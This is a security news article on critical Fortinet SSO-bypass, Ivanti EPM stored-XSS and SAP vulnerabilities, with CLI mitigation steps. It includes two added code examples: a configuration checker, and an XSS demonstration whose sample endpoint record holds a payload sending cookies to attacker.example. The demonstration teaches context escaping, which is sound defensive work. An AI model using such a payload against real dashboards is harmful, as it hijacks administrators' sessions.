Dec 10, 2025 | Ravie Lakshmanan | Vulnerability / Endpoint Security
Fortinet, Ivanti, and SAP have moved to address critical security flaws in their products that, if successfully exploited, could result in authentication bypass and code execution.
The Fortinet vulnerabilities affect FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager and relate to a case of improper verification of a cryptographic signature. They are tracked as CVE-2025-59718 and CVE-2025-59719 (CVSS scores: 9.8).
"An Improper Verification of Cryptographic Signature vulnerability [CWE-347] in FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML message, if that feature is enabled on the device," Fortinet said in an advisory.
The company, however, noted that the FortiCloud SSO login feature is not enabled in the default factory settings. FortiCloud SSO login is enabled when an administrator registers the device to FortiCare and has not disabled the toggle "Allow administrative login using FortiCloud SSO" on the registration page.
To temporarily protect their systems against attacks exploiting these vulnerabilities, organizations are advised to disable the FortiCloud login feature (if enabled) until the device can be updated. This can be done in two ways –
Go to System -> Settings -> Switch "Allow administrative login using FortiCloud SSO" to Off
Run the below commands in the CLI –
config system global
    set admin-forticloud-sso-login disable
end
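A fleet-wide check for that CLI setting, as an added example (this is not Fortinet's code or tooling). It assumes the dumps are the text of `show full-configuration system global`, which lists every setting including defaults, and that the toggle appears inside the `config system global` block as `set admin-forticloud-sso-login enable|disable`; the device names and dump contents are constructed.

```python
"""Check FortiOS configuration dumps for the FortiCloud SSO admin-login toggle.

Added example, not Fortinet's code. It assumes the text of
`show full-configuration system global`, where the toggle appears inside the
`config system global` block as `set admin-forticloud-sso-login enable|disable`.
"""
import re
from typing import Dict, List, Optional, Tuple

SETTING = "admin-forticloud-sso-login"
_SET_RE = re.compile(rf"^set {re.escape(SETTING)} (enable|disable)$")

# Constructed sample dumps keyed by device name (hostnames and values are made up).
SAMPLE_DUMPS: Dict[str, str] = {
    "fw-edge-01": (
        "config system global\n"
        "    set admin-forticloud-sso-login enable\n"
        "    set admin-sport 443\n"
        '    set hostname "fw-edge-01"\n'
        "end\n"
    ),
    "fw-edge-02": (
        "config system global\n"
        "    set admin-forticloud-sso-login disable\n"
        '    set hostname "fw-edge-02"\n'
        "end\n"
    ),
    # A plain `show` omits settings still at their default, so the toggle is absent here.
    "fw-lab-03": (
        "config system global\n"
        '    set hostname "fw-lab-03"\n'
        "end\n"
    ),
}


def forticloud_sso_state(dump: str) -> Optional[str]:
    """Return 'enable', 'disable', or None when the toggle is not present in
    the top-level `config system global` block of the dump."""
    depth = 0          # nesting depth of config ... end blocks
    in_global = False  # True while inside the top-level `config system global`
    for raw in dump.splitlines():
        line = raw.strip()
        if line.startswith("config "):
            depth += 1
            if depth == 1 and line == "config system global":
                in_global = True
            continue
        if line == "end":
            if depth == 1 and in_global:
                break  # left the block we care about
            depth = max(depth - 1, 0)
            continue
        if in_global and depth == 1:
            m = _SET_RE.match(line)
            if m:
                return m.group(1)
    return None


def triage(dumps: Dict[str, str]) -> Tuple[List[str], List[str]]:
    """Split devices into (needs_mitigation, unknown).

    'enable' means the interim workaround (or the firmware update) still has to be
    applied. None is reported as unknown rather than assumed safe: the dump may be a
    plain `show` that hides default values, so re-collect it with
    `show full-configuration`."""
    needs, unknown = [], []
    for name, dump in dumps.items():
        state = forticloud_sso_state(dump)
        if state == "enable":
            needs.append(name)
        elif state is None:
            unknown.append(name)
    return sorted(needs), sorted(unknown)


if __name__ == "__main__":
    needs, unknown = triage(SAMPLE_DUMPS)
    print("apply mitigation on:", needs)
    print("re-collect full config for:", unknown)
```

The absent-setting case is reported separately on purpose: since Fortinet states the toggle becomes enabled through FortiCare registration rather than at factory default, a dump that does not show the line should not be read as "disabled".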
Ivanti Releases Fix for Critical EPM Flaw
Ivanti has also shipped updates to address four security flaws in Endpoint Manager (EPM), one of which is a critical-severity bug in the EPM core and remote consoles. The vulnerability, assigned the CVE identifier CVE-2025-10573, carries a CVSS score of 9.6.
"Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session," Ivanti said.
Rapid7 security researcher Ryan Emmons, who discovered and reported the shortcoming on August 15, 2025, said it allows an attacker with unauthenticated access to the primary EPM web service to join fake managed endpoints to the EPM server so as to poison the administrator web dashboard with malicious JavaScript.
"When an Ivanti EPM administrator views one of the poisoned dashboard interfaces during normal usage, that passive user interaction will trigger client-side JavaScript execution, resulting in the attacker gaining control of the administrator's session," Emmons said.
The company noted that user interaction is required to exploit the flaw and that it is not aware of any attacks in the wild. It has been patched in EPM version 2024 SU4 SR1.
Also patched in the same version are three other high-severity vulnerabilities (CVE-2025-13659, CVE-2025-13661, and CVE-2025-13662) that could allow a remote, unauthenticated attacker to achieve arbitrary code execution. CVE-2025-13662, like CVE-2025-59718 and CVE-2025-59719, stems from improper verification of cryptographic signatures, in this case in the patch management component.
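The pattern Emmons describes, data submitted by an endpoint the server never vetted landing unescaped in an administrator's page, shown as an added example of a vulnerable renderer beside a hardened one. This is not Ivanti's code and says nothing about how EPM builds its dashboard; the table layout, field names and payload are constructed for illustration.

```python
"""Stored XSS in an admin dashboard fed by self-enrolled endpoints: a vulnerable
row renderer beside a hardened one.

Added example, not Ivanti's code; the dashboard markup, the field names and the
payload are constructed to illustrate the pattern described above.
"""
import html
from typing import Dict

# Constructed: an endpoint record as an attacker who can enrol a fake agent might submit it.
HOSTILE_ENDPOINT: Dict[str, str] = {
    "hostname": '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
    "os": '" onmouseover="alert(1)',   # aimed at the attribute context below
}


def render_row_vulnerable(ep: Dict[str, str]) -> str:
    """Agent-supplied strings interpolated straight into markup (the bug)."""
    return (f'<tr title="{ep["os"]}"><td>{ep["hostname"]}</td>'
            f'<td>{ep["os"]}</td></tr>')


def render_row_hardened(ep: Dict[str, str]) -> str:
    """Every untrusted value is escaped for the context it lands in.

    html.escape(quote=True) covers element text and quoted attribute values;
    unquoted attributes, JavaScript and URL contexts need different encoders."""
    def esc(s: str) -> str:
        return html.escape(s, quote=True)
    return (f'<tr title="{esc(ep["os"])}"><td>{esc(ep["hostname"])}</td>'
            f'<td>{esc(ep["os"])}</td></tr>')


def breaks_out_of_context(rendered: str) -> bool:
    """Crude detector for the demo: does a raw tag or an injected event-handler
    attribute survive rendering?"""
    return ("<img" in rendered
            or 'onerror="' in rendered
            or '" onmouseover="' in rendered)


if __name__ == "__main__":
    print("vulnerable:", render_row_vulnerable(HOSTILE_ENDPOINT))
    print("hardened:  ", render_row_hardened(HOSTILE_ENDPOINT))
```

Escaping at render time is the fix that matters for an administrator who merely views the page; validating the hostname at enrolment is a worthwhile second layer but not a substitute, because the stored value can still reach other templates.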
SAP Fixes Three Critical Flaws
Lastly, SAP has pushed December security updates to address 14 vulnerabilities across multiple products, including three critical-severity flaws. They are listed below –
CVE-2025-42880 (CVSS score: 9.9) – A code injection vulnerability in SAP Solution Manager
CVE-2025-55754 (CVSS score: 9.6) – Multiple vulnerabilities in Apache Tomcat within SAP Commerce Cloud
CVE-2025-42928 (CVSS score: 9.1) – A deserialization vulnerability in SAP jConnect SDK for Sybase Adaptive Server Enterprise (ASE)
Boston-based SAP security firm Onapsis has been credited with reporting CVE-2025-42880 and CVE-2025-42928. The company said it identified a remote-enabled function module in SAP Solution Manager that allows an authenticated attacker to inject arbitrary code.
"Given the central role of SAP Solution Manager in the SAP system landscape, we strongly recommend a timely patch," Onapsis security researcher Thomas Fritsch said.
CVE-2025-42928, on the other hand, allows for remote code execution by providing specially crafted input to the SAP jConnect SDK component. However, successful exploitation requires elevated privileges.
With security vulnerabilities in Fortinet, Ivanti, and SAP software frequently exploited by threat actors, it is essential that users move quickly to apply the fixes.
